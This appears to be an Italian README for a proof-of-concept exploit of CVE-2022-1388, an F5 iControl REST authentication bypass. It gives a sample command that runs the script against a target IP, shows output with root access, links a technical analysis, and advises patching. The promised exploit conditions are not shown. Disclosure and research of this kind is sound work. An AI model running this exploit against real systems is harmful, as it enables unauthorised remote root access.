
POC per CVE-2022-1388
POC per CVE-2022-1388 che colpisce diversi prodotti F5.
Un'analisi tecnica delle cause principali della vulnerabilità può essere trovata sul nostro blog: https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/
Condizioni necessarie di una richiesta per sfruttare questa vulnerabilità:
root@kali:/home/dev# python3 CVE-2022-1388.py -t 192.168.0.221 -c id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
Aggiorna all'ultima versione o mitigare seguendo le istruzioni contenute nell'avviso di sicurezza F5
Questo software è stato creato esclusivamente per scopi di ricerca accademica e per lo sviluppo di tecniche difensive efficaci, e non è inteso per essere utilizzato per attaccare sistemi se non esplicitamente autorizzato. I mantenitori del progetto non sono responsabili per un uso improprio del software. Utilizzare in modo responsabile.